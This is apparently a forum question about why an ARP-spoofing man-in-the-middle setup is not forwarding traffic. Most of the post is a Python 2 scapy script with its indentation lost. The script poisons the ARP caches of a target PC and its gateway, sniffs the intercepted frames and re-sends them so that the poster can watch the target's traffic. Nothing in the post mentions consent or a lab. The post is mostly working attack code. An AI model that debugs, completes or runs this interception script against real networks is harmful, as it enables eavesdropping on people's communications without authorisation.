I had done ARP spoofing successfully using scapy python code. The mac address in target's pc for gateway has been changed to my pc's mac address and mac adres of target pc in router's cache has been chnged to my mac addres. Now I want to forward these packets to respective location though my pc. So that I can see traffic between target pc and gateway.But it's not working.
import os
import sys
import threading
import signal
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
our_mac='d8:5d:e2:0c:58:87'
print 'Enter Target IP:'
target_ip = raw_input()
print 'Enter Gateway IP'
gateway_ip = raw_input()
packet_count = 50
# turn off output
conf.verb = 0
def get_mac(ip_address):
responses,unanswered =srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
# return the MAC address from a response
for s,r in responses:
return r[Ether].src
return None
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip,target_mac)
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
# slightly different method using send
print"[*] Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=100)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=100)
# signals the main thread to exit
print"[*] Target Restored..."
sys.exit(0)
os.kill(os.getpid(), signal.SIGINT)
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst= target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst= gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
print "[*] ARP poison attack finished."
sys.exit(0)
return
def send_packet_to_gateway(pkt):
try:
if(pkt.haslayer(IP) and pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=gateway_mac
sendp(pkt)
elif(pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=gateway_mac
sendp(pkt)
except:
print "It's interrupt"
sys.exit(0)
def send_packet_to_target(pkt):
try:
if(pkt.haslayer(IP) and pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=target_mac
sendp(pkt)
elif(pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=target_mac
sendp(pkt)
except:
print "It's interrupt"
sys.exit(0)
def capture_packets():
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "dst host %s and ether dst %s" % (target_ip, our_mac)
sniff(filter=bpf_filter,prn=send_packet_to_target)
except KeyboardInterrupt:
# restore the network
#restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
print "It's interrupt"
sys.exit(0)
return
# start poison thread
poison_thread = threading.Thread(target = poison_target, args =(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
capture_thread = threading.Thread(target = capture_packets)
capture_thread.start()
bpf_filter = "src host %s and ether dst %s" % (target_ip,our_mac)
sniff(filter=bpf_filter,prn=send_packet_to_gateway)
except KeyboardInterrupt:
sys.exit(0)
# restore the network
#restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
#sys.exit(0)
